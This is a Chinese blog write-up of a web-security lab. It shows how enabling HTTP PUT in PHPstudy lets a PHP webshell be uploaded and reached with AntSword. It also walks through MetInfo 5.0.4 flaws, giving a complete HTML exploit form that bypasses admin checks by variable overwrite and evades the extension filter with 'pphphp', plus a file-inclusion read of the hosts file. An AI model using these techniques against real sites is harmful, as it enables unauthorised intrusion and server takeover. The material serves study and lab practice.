PHPstudy PUT方法上传文件

于 2021-10-20 23:22:18 发布
阅读量3.2k 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Feng_Blue_/article/details/120873201
版权

目录

要想开启PUT,需要修改PHPstudy的配置文件。

metinfov5.0.4

metinfov5.0.4的10.21更新

要想开启PUT,需要修改PHPstudy的配置文件。

 根据路径打开配置文件,启用模块,记得对修改的模块备份

启用模块

 添加目录

根据自己的路径修改,记得保存,重启服务 ,

可以通过BP抓取上传文件的包,对上传类型进行修改,也可通过kali自带的cadaver来实现

 通过help可以指定支持哪些命令使用 

lls是查看本机的文件,ls是查看服务器的文件,通过put上传一句话木马,使用蚁剑链接。

 蚁剑成功连接,

而目录下也有1.php 

metinfov5.0.4

 漏洞位置

http://192.168.40.137/MetInfo5.0.4/admin/include/uploadify.php

uploadify.php

看到包含"common.inc.php"  查看

 看到在管理员权限一栏有SQL认证,但并未添加过滤,存在绕过。

文件上传类型也有限制 

可以采用双写绕过(pphphp) 

编写表单

<html>
<form enctype="multipart-data" method="post"
	name="myForm"
	action="http://192.168.40.137/MetInfo5.0.4/admin/include/uploadify.php?
	、、metinfo_admin_id=root&metinfo_admin_pass=root&met_admin_table=met_admin_table#&type=upfile&met_file_format=jpg|pphphp
">
<input name="Filedata" type="file" size=20>
<input type="submit" name="Submit" value="0.0">
</html>

metinfov5.0.4的10.21更新

基于面对代码,进行代码审计,利用工具对整个网站的代码进行一个扫描审计

看到可能存有文件包含漏洞,对源码进行一个访问。

可以看到 require_once $module,还有require_once '../include/module.php',对module.php进行查看。

找到$module, 在没有对$module传参的时候,直接返回一个404.html,最下面对$module给予了一个值,且文件开头又包含了另一个文件

进行访问

 看到cookei、post、get、三个传参方法,中间还有$$_request,  $_key是键,$value是值,

对该串代码进行测试

 访问:

看到输出了Feng_Blue

对$name进行修改

 在url中对name进行赋值,但源文件中并没有修改,发现在url传递的参数直接覆盖了源文件中的内容。

name=Feng_Blue

name被当成变量名,Feng_Blue为参数值,不传参就输出定义过的name,传参则就覆盖原文件内的name的值,是一个变量覆盖漏洞。

此时我们回到../adout/index/php

尝试替换带$module

 而此时发现,并没有覆盖掉$module,对源代码进行修改,尝试print一下这个$module,记得备份。

 保存源码后刷新

 弹出show.php,再进行赋值:

依旧回显show.php,说明对这个 $module初始化了。

 我们回头查看module.php

 当$fmodule不等于7的时候进行初始化,而我们需要让它等于7。因为$module再if分支。

尝试:

 成功

 查看:\windows\system32\drivers\etc\hosts

文件包含漏洞复现

Feng_Blue_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用phpstudy搭建php上传实战
weixin_44281516的博客
11-20 2449
利用phpstudy搭建php上传漏洞实战 首先下载去官网下载phpstudy 可以访问phpstudy官网下载,我这边下载的是64位的。 下载完成之后安装+启动 打开浏览器访问http://127.0.0.1说明web环境搭建成功。 打开文件位置 进入www目录下 我们可以在这个目录下写入我们自己的代码 首先写一个前端页面upload.html用来上传文件 <html> ...
网站调用php文件上传,window_php文件上传的实现,       PHP - phpStudy
weixin_31512775的博客
03-21 113
php文件上传的实现PHP同样支持上传文件的功能,但并不是所有支持PHP的网站都支持此功能,特别是免费的网站。实现上传,首先要在HTML上加入上传文件的“<FORM>”表格。<form method=post action="upload.php" ENCTYPE="multipart/form-data"><input type="file" name="upload_file"><input ...
php文件上传到d盘,php文件上传详细介绍 - phpstudy
weixin_36209030的博客
03-10 331
下载地址: 下载版:http://lamp.phpstudy.net/phpstudy.bin 完整版:http://lamp.phpstudy.net/phpstudy-all.bin PHP环境支持: 解释:Apache/Nginx/Tengine/Lighttpd PHP版本:支持php5.2/5.3/5.4/5.5切换 操作系统:...这里首先声明一下这一章的...
php实现put上传文件,PHP的文件上传处理:对 PUT 方法的支持
weixin_39883256的博客
03-20 669
PHP 3 和 PHP 4 对 PUT 方法的支持有所不同。在 PHP 4 中,必须使用标准的输入流来读取一个 HTTP PUT 的内容。Example #1 用 PHP 4 来保存 HTTP PUT 文件andwritetothefile*/while($data=fread($putdata,1024))fwrite($fp,$data);/*Closethestream...
put上传接口数据php,php – 使用API​​ PUT请求上传文件
weixin_32641435的博客
03-17 286
我正在PHP中构建一个API。其中一种方法是place.new(PUT请求)。它期望几个字符串字段,它也期望一个图像。但是我不能让它工作。使用POST请求很容易,但我不知道如何使用PUT和如何在服务器上获取数据。谢谢您的帮助!测试CURL代码$curl = curl_init();curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 2);curl_setopt($...
phpstudy探针文件.php
07-19
该文件放在任意目录下均可访问; url打开该文件后,会看到服务器相关参数配置,不需要到配置文件中检索; 该文件查看配置参数较为全面,建议长期保存使用;
phpstudy隐藏index.php的方法
01-19
phpstudy如何隐藏index.php 找到打开 vhosts-ini location / { **if (!-e $request_filename) ...PS:下面看下phpstudy 中使index.php文件优先于index.html 相信有很多人碰到在根目录同时存在index.html和index.php文
phpstudy的php版本自由修改的方法
12-19
网上有着许多的网站集成搭建软件,比较出名的就有wamp,xampp,phpstudy等等 现在就来讲一讲phpstuy的php版本自由切换 安装下载之类的就不说了,http://www.phpstudy.net/ 官网就有,十分简单 看看界面,软件的作者...
php文件上传 你真的掌握了吗
12-19
PHP提供了`$_FILES`全局数组,用于存储上传文件的相关信息,如文件名、类型、大小、临时文件路径和错误状态。例如,`$_FILES['myfile']['name']`代表了名为'myfile'的输入字段上传的文件原始名称,而`$_FILES['...
Socket实现Http上传文件的代码
08-11
该代码实现了对于socket发送http请求上传文件的封装,且上传了一个模拟服务端的php代码,在 test目录,首先需要自己下载PHPStudy安装好,然后将下载下来的资源中test目录的文件复制到php目录下www目录中,启动...
php上传文件方法put,上传文件之PUT方法上传(服务器配置不当)
weixin_32279335的博客
03-20 558
实验环境Window server 2008 +phpstudy第一章 文件上传的条件Web 服务器要开启文件上传功能,并且上传api(接口)对外“开放”(Web 用户可以访问);Web 用户对目标目录具有可写权限,甚至具有执行权限,一般情况下,Web 目录都有执行权限。要想完美利用文件上传漏洞,就是上传的文件可以执行,也就是Web 容器可以解析我们上传的脚本,无论脚本以什么样的形式存在。无视以上...
put上传接口数据php,将文件上传到PHP的Curl PUT请求
weixin_30420799的博客
03-17 217
我正在尝试使用HTTP PUT上传文件.看了一下后,似乎$_FILES数组只有POST和multipart / form-data.使用PUT时,我需要手动读取php://输入以获取数据.两种方法都不起作用.我尝试了以下选项,并感谢您提供的任何提示:curl --upload avatar.jpg http://api.test.com/user/dsadasdsacurl -X PUT -F "...
上传文件的php代码,PHP_PHP 文件上传功能实现代码,个人认为PHP文件的上传和下载 - phpStudy...
weixin_42499882的博客
03-09 127
PHP 文件上传功能实现代码个人认为PHP文件的上传和下载的思路差不多一样.也就是在代码中多了一个header语句以下是详细的代码.仅供参考.入口文件复制代码 代码如下:enctype="multipart/form-data">Filename:" />php写的处理文件if( empty($_GET['FileName'])){echo' alert("非法连接 !"); loca...
php ftp文件传送,PHP FTP_PUT上传到目录
weixin_35662528的博客
03-10 364
由于@Bonner表示Fabien的答案不正确,因为您正在寻找一个脚本来将文件从您网站上的页面上传到服务器.首先要记住的是,ftp_put()功能将永远覆盖现有的文件.相反,我建议您查看PHP move_uploaded_file码这是表格.在action属性中,我们指定一个文件,它将处理和处理所有文件.您需要使用表单的enctype属性的multipart / form-data值.我几乎无处不...
put上传接口数据php,api - php 如何判断有PUT方式的文件上传?
weixin_32620855的博客
03-17 132
这个上传是可选的,如果有,连同表单在内的其他字段一齐有PUT方式发送过来,那么怎么判断传过来的有没有上传文件文件呢?我现在的解决办法是,读取PUT文件并入到一个临时文件里面,再用fiesize判断这个文件大小,如果为0的时候说明没有上传,但觉得这样做不稳妥,来请教一下。$handle = fopen('php://input', 'r');$fp = fopen($tmp_as, "w+");w...
phpstudy修改上传文件的大小
zxy15538191283的博客
05-31 3814
在配置文件php-ini中,更改两个地方的大小即可,修改完后重启phpstudy环境,即可上传大内存的图片或者文件或者视频。
文件上传漏洞(漏洞产生因素、前端验证绕过,php标签绕过)
ShenZ的博客
08-07 1244
文件上传漏洞 copy xx.png/b+xx.txt xx.png 在嵌入了php脚本的html中,使用 phtml作为后缀名 php,php3,php4,php5,phtml.pht 上传漏洞相关因素 1.可解析的后缀, 也就是该语言有多个可解析的后缀,比如php语言可解析的后缀为php,php2,php3等等 2.大小写混合, 如果系统过滤不严,可能大小写可以绕过。 3.中间件, 每款中间件基本都解析漏洞,比如iis就可以把xxx.asp;.jpg当asp来执行。 4.系统特性, 特别是Window
php put怎么接收文件,php,restful_PHP PUT方式传文件的话,如何获取文件内容呢 ?,php,restful,http - phpStudy...
weixin_33860377的博客
03-18 128
PHP PUT方式传文件的话,如何获取文件内容呢 ?最近因为在做前后端分离,后端PHP所有Api都使用RESTFul风格。但是在使用PUT上传文件的时候,发现$_FILES没有文件信息(可能没有上传临时文件,待验证),使用POST是可以的,并且PUT从标准输入流获取过来的数据,读取出来是下面这种格式(上面我猜测没有上传临时文件,是因为看标准输入流里面存着文件信息),需要另外解析。#获取到的输入流内...
文件上传漏洞及部分绕过方法分享
时乙的博客
09-18 2712
文件上传的定义 文件上传在web中运用非常的广泛,可以说是web开发必备功能,比如注册网站时上传头像,某些论坛中图片,文件上传等,本来这项工能是为了给用户提供方便,但如果因为某些原因产生漏洞,被骇客利用,就会对服务器产生严重破坏。 文件上传漏洞产生原因 导致文件上传漏洞的原因有很多,根据网上的资料,我主要找到以下几类: 1、服务器配置不当; 比如:开启http put方法,在没有上传页面的情况下也能上传文件。 2、服务端过滤不严格被绕过; 服务器上对文件上传做了部分过滤...
phpstudy的.htaccess文件
最新发布
07-07
对于使用PHPStudy的用户来说,可以通过.htaccess文件来配置网站的访问权限、URL美化等。 以下是一些.htaccess文件的常见用法示例: 1. URL重写规则:可以使用RewriteEngine指令开启URL重写功能,并使用RewriteRule...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值